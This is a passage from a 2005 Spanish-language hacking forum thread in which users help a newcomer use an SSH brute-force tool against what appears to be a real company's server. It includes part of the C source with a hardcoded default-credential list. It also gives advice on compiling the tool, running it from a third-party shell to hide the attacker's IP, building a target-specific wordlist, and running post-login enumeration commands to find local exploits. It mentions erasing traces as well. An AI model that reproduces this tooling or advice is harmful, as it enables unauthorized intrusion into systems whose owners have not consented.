maxf=atoi(argv[1]);
while(fgets(buff,sizeof(buff),fp))
{
c=strchr(buff,'\n');
if(c!=NULL) *c='\0';
if (!(fork()))
{
//child
where=0;
checkauth("test","test",buff);
checkauth("guest","guest",buff);
checkauth("admin","admins",buff);
checkauth("admin","admin",buff);
checkauth("user","user",buff);
checkauth("root","password",buff);
checkauth("root","root",buff);
checkauth("root","123456",buff);
checkauth("test","123456",buff);
checkauth("test","12345",buff);
checkauth("test","1234",buff);
checkauth("test","123",buff);
checkauth("root","!@#$%",buff);
checkauth("root","!@#$%^",buff);
checkauth("root","!@#$%^&",buff);
checkauth("root","!@#$%^&*",buff);
checkauth("root","*",buff);
checkauth("root","000000",buff);
checkauth("root","00000000",buff);
exit(0);
}
else
{
//parent
numforks++;
if (numforks > maxf)
for (numforks; numforks > maxf; numforks--)
wait(NULL);
}

}

}


Pues bueno... ahora quisiera exactamente que me dijeran que es lo siguiente que debo hacer??? si no es mucha molestia  //yo pienso que debo agarrar ese código, agarrar el kdevelop (el que uso yo) ponerlo en un nuevo proyecto... y luego utilizarlo... el problema es que ya lo he intentado... pero al parecer no me anda el programa o algo ocurre... o sea, algo estoy haciendo mal o hay algo que me falta... por eso les escribo...
En línea
strike-maXter

Desconectado Desconectado

Mensajes: 183



Ver Perfil
Re: Un hecho real - penetración
« Respuesta #8 en: 14 Febrero 2005, 20:53 »

Yo creo que antes de hackear o intentar hackear un sistema real deberias hackear un sistema desde una red local o mismamente desde tu casa o otro equipo.Si vas a por un dominio real ten por seguro que te la estas jugando a lo tonto sin saber muy bien como no ser descubierto. Ya sabes que un hacker primero se documenta, segundo se documenta, tercero se documenta, cuarto hace un plan, quinto rastrea, sexto ataca.Creo que tu deberias estar en el segundo paso.
En línea

Sultan de la Red, Guardián de la Noche. Solitario Guerrero y Secuaz de la Muerte.
fandango
Another
Colaborador

Desconectado Desconectado

Mensajes: 1.921


Powered By Slackware!


Ver Perfil
Re: Un hecho real - penetración
« Respuesta #9 en: 14 Febrero 2005, 21:58 »

zeta007 lo compilas con gcc exploit.c -o exploit
En línea

zeta007

Desconectado Desconectado

Mensajes: 116



Ver Perfil
Re: Un hecho real - penetración
« Respuesta #10 en: 15 Febrero 2005, 03:08 »

Respondiendo a strike-maXter:
Gracias por tu advertencia, pero me he tomado todo el tiempo del mundo para ver lo que estoy haciendo... y solamente quiero ver si puedo sacar las contraseñas y los usuarios para luego avisarle a éste. No entraré a un lugar (ya que esto es algo serio), solamente quiero, por primera vez, saber que he descubierto algo que los mismos de la empresa no saben... (incrementa mi experiencia, adrenalina en mi vida informática, mis ganas de estudiar, y mi ego).

Por otra parte, he dedicado un tiempo para planear un plan ;D , entrar en un sistema con los puertos del net-bios abiertos de una máquina de un ciber donde estará mi amigo, para decirme por medio de una telecomunicación (MSN posiblemente) para comprobar si puedo entrar como dice en un documento by Rojodos y qué es lo que le ocurre a esa máquina al estar integrada por alguien más de su propio usuario.

También, me he tomado la libertad de leer muchos manuales de seguridad, zappers, y todo relacionado acerca de mis huellas y cómo borrarlas.

Igualmente, gracias por tu comentario ;)

// Y muchas gracias también a Fandango que me estuvo ayudando (sos un kpo ;D)
En línea
strike-maXter

Desconectado Desconectado

Mensajes: 183



Ver Perfil
Re: Un hecho real - penetración
« Respuesta #11 en: 15 Febrero 2005, 06:24 »

Ah! vale, si vas con esa intención me vale.Menos mal que tu intención va acorde con la etica hacker.Ya sabes, penetrar y luego informar.

En cuanto al post anterior de fandango, despues de compilar comprueba que tiene permisos de ejecucion, por si no lo sabes(cosa que dudo) el comando es chmos a+x exploit.

Salu2!
En línea

Sultan de la Red, Guardián de la Noche. Solitario Guerrero y Secuaz de la Muerte.
EL_ZoRRo

Desconectado Desconectado

Mensajes: 233



Ver Perfil
Re: Un hecho real - penetración
« Respuesta #12 en: 15 Febrero 2005, 11:58 »

Bueno te voy a dar un poco de ayuda aunque te vendria bien por lo menos manejar el interprete bash

Esa herramienta es un brute force para SSH, llenaras de logs el server  :-[ , Pero lo que puedes hacer es subirla a una shell y ejecutarla desde alli para que no quede tu ip.
Hace tiempo que salio esta herramienta asi que cualquier admin ha echo una revision de su pass de root con respecto a esta .

Lo con veniente seria que edites lo sig

Código:
checkauth("test","test",buff);
checkauth("guest","guest",buff);
checkauth("admin","admins",buff);
checkauth("admin","admin",buff);
checkauth("user","user",buff);
checkauth("root","password",buff);
checkauth("root","root",buff);
checkauth("root","123456",buff);
checkauth("test","123456",buff);
checkauth("test","12345",buff);
checkauth("test","1234",buff);
checkauth("test","123",buff);
checkauth("root","!@#$%",buff);
checkauth("root","!@#$%^",buff);
checkauth("root","!@#$%^&",buff);
checkauth("root","!@#$%^&*",buff);
checkauth("root","*",buff);
checkauth("root","000000",buff);
checkauth("root","00000000",buff);

Cambiez los pas por los de un user cualquiera como por ejemplo

Código:
checkauth("alex","alex",buff);
checkauth("alex","!alex!",buff);

Y demas user y pass que se te púedan ocurrir haciendo refernecia al server a atacar por esto es necesario que recopiles mucha info asi te puedes armar una lista buena wordlist , y es bueno el tema de armar listas de users ya que los mismo no cuidan tantos sus pass......
Luego una vez dentro

Código:
uname -a
cat /etc/issue
cat /proc/version
set | grep MACHTYPE
id
ps -ax


A ver con que te encuntras y que puedes explotar localmente ya que te sera mas facil que remotamente.

Salu2
En línea
strike-maXter

Desconectado Desconectado

Mensajes: 183



Ver Perfil
Re: Un hecho real - penetración
« Respuesta #13 en: 15 Febrero 2005, 20:14 »

En eso discrepo un poco, puesto que a mi parecer es mas facil localmente que remotamente, y si lo compilas en la misma maquina a atacar, mejor.

Salu2!
En línea

Sultan de la Red, Guardián de la Noche. Solitario Guerrero y Secuaz de la Muerte.
strike-maXter

Desconectado Desconectado

Mensajes: 183



Ver Perfil
Re: Un hecho real - penetración
« Respuesta #14 en: 15 Febrero 2005, 20:18 »

Ups! Sorry! No se leer jeje. Entonces me sumo a la opinion de El_zorro.
En línea

Sultan de la Red, Guardián de la Noche. Solitario Guerrero y Secuaz de la Muerte.
Páginas: [1] 2 3 Ir Arriba Imprimir 
Ir a:  







Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.7 | SMF © 2006-2008, Simple Machines LLC